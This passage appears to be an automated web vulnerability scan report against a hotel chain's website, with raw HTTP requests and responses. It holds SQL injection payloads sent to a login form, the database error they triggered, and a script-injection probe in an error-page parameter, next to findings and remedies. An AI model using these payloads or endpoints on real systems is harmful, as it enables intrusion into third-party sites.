function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="Ronald Smith" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>

- /development/login.aspx

/development/login.aspx

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST 3
submitbutton POST Login
uname POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=s1brdh55x3sqf255y5i4kt45; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 380
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=3&submitbutton=Login&uname='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4714



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="3" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>

Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /promotions/best-rate-guarantee.aspx

/promotions/best-rate-guarantee.aspx CONFIRMED

http://www.kimptonhotels.com/promotions/best-rate-guarantee.aspx

Form target action

/intouch/InTouchSignInProxy.aspx

Request

GET /promotions/best-rate-guarantee.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68566



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels &amp; Restaurants - Promotions - Best Rate Guarantee</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Care, comfort, style, flavor, fun - Kimpton Hotels have it all. Four star boutique hotels and gourmet restaurants in San Francisco, Washington DC, Chicago and other great cities.">
<meta name="keywords" content="Kimpton boutique hotels, boutique hotels, botiuqe hotels, small luxury hotels, hip hotels, best hotels, 4 star hotels, gourmet restaurants, guest rewards program, corporate social responsibility, honeymoon hotels, wedding hotels, green hotels, pet friendly hotels, womens travel, top restaurants, business hotels">
<meta name="WT.sp" content="KC-Corp">
<script type="text/javascript" src="../_js/menucontrol.js"></script>
<script type="text/javascript" src="../_js/snipe_control.js"></script>
<script src="../_js/IEHoverPseudo.js" language="javascript"></script>
<script src="../_js/SpryMenuBar.js" type="text/javascript"></script>
<script src="../_js/rollover.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="../_css/global.css">
<!--FXID_BOOKMARK -->
</head>
<body onLoad="IEHoverPseudo()">
<center>
<!-- INTOUCH INC-->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
<!-- TOPNAV INC START -->
<div class="navtop">
<table width="923" height="70" cellspacing="0" cellpadding="0" border="0">
<tr><td width="144"><a href="/index.aspx"><img src="../assets/logo.gif" width="144" height="50" border="0" /></a></td>
<td width="779">


<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-on.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-chicago/">Hotel Palomar Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-dallas/">Hotel Palomar Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-los-angeles-westwood/">Hotel Palomar LA-Westwood<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-philadelphia/">Hotel Palomar Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-san-francisco/">Hotel Palomar San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-washington-dc/">Hotel Palomar Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent">&l..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection or could be the result or poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /404.aspx

/404.aspx CONFIRMED

http://www.kimptonhotels.com/404.aspx?aspxerrorpath=/promotions/rub-the-one-youre-with.aspx&nsextt='..

Parameters

Parameter Type Value
aspxerrorpath GET /promotions/rub-the-one-youre-with.aspx
nsextt GET '"--><script>netsparker(0x0020EB)</script>

Request

GET /404.aspx?aspxerrorpath=/promotions/rub-the-one-youre-with.aspx&nsextt='%22--%3E%3Cscript%3Enetsparker(0x0020EB)%3C/script%3E HTTP/1.1
Referer: http://www.kimptonhotels.com/promotions/rub-the-one-youre-with.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=fxr4qj55abevceznvtq3yavy; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 06 Oct 2010 02:48:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026


<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Runtime Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>

<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a &quot;web.config&quot; configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its &quot;mode&quot; attribute set to &quot;Off&quot;.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;Off&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the &quot;defaultRedirect&quot; attribute of the application's &lt;customErrors&gt; configuration tag to point to a custom error page URL.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

</body>
</html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /promotions/best-rate-guarantee.aspx

/promotions/best-rate-guarantee.aspx CONFIRMED

http://www.kimptonhotels.com/promotions/best-rate-guarantee.aspx

Identified Field Name

strPass

Request

GET /promotions/best-rate-guarantee.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68566



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels &amp; Restaurants - Promotions - Best Rate Guarantee</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Care, comfort, style, flavor, fun - Kimpton Hotels have it all. Four star boutique hotels and gourmet restaurants in San Francisco, Washington DC, Chicago and other great cities.">
<meta name="keywords" content="Kimpton boutique hotels, boutique hotels, botiuqe hotels, small luxury hotels, hip hotels, best hotels, 4 star hotels, gourmet restaurants, guest rewards program, corporate social responsibility, honeymoon hotels, wedding hotels, green hotels, pet friendly hotels, womens travel, top restaurants, business hotels">
<meta name="WT.sp" content="KC-Corp">
<script type="text/javascript" src="../_js/menucontrol.js"></script>
<script type="text/javascript" src="../_js/snipe_control.js"></script>
<script src="../_js/IEHoverPseudo.js" language="javascript"></script>
<script src="../_js/SpryMenuBar.js" type="text/javascript"></script>
<script src="../_js/rollover.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="../_css/global.css">
<!--FXID_BOOKMARK -->
</head>
<body onLoad="IEHoverPseudo()">
<center>
<!-- INTOUCH INC-->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
